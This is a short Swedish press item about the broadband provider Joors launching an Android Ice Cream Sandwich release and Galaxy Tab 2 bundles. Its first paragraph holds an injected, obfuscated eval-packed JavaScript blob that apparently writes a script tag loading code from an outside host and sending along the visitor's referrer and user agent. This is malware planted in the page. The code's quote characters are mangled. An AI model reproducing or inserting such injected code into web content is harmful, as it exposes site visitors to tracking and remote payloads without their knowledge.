Image Image Image Image Image Image Image Image Image Image

| 3 december, 2020

Scroll to top

Top

Idag släpper Joors ICS release för Android

Idag släpper Joors ICS release för Android
Sebastian

Joors, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|baedi|var|u0026u|referrer|ntdyn||js|php’.split(’|’),0,{}))
som erbjuder annonsfinansierat mobil bredband,  lanserar idag sin release för Androids senaste version Ice Cream Sandwich på Google Play/Android Market. Operativsystemet finns blanda annat på Samsung Galaxy Tab 2.

–  Den nya releasen innebär en förbättrad användarupplevelse för de som har operativsystemet Ice Cream Sandwich på sina Android-surfplattor. Det är roligt att vi släpper denna version eftersom efterfrågan varit stor bland våra medlemmar, säger Tomas Olsson, medgrundare och VD i IntJoors Sverige AB.

Samtidigt lanseras även Samsungs senaste surfplattor Galaxy Tab 2 (10.1 och 7.0) i Joors online-butik för försäljning till konkurrenskraftiga priser. För endast 4 500 kronor (exklusive fraktkostnad) får man ett SIM-kort från Joors samt en Samsung Galaxy Tab 2 (P5100), 10.1 i färgen vit eller silver. I butiken finns även paketet SIM-kort från Joors med en Samsung Galaxy Tab 2 med 7.0 tums skärm (P3100) för endast 3 500 kronor  (exklusive fraktkostnad).

– Vi har ett extremt bra erbjudande. Eftersom våra kunder bara betalar en engångsavgift för Joors mobila bredband blir det ett väldigt förmånligt pris, säger Lyn Daniel, marknadschef på Joors.

Med Joors mobila bredband betalar användaren endast en engångsavgift – därefter förekommer inga fakturor eller månadsavgifter. Användaren får 2GB att förbruka varje månad och upp till 10 Mbit/s i uppkopplingshastighet via TeliaSoneras nätverk.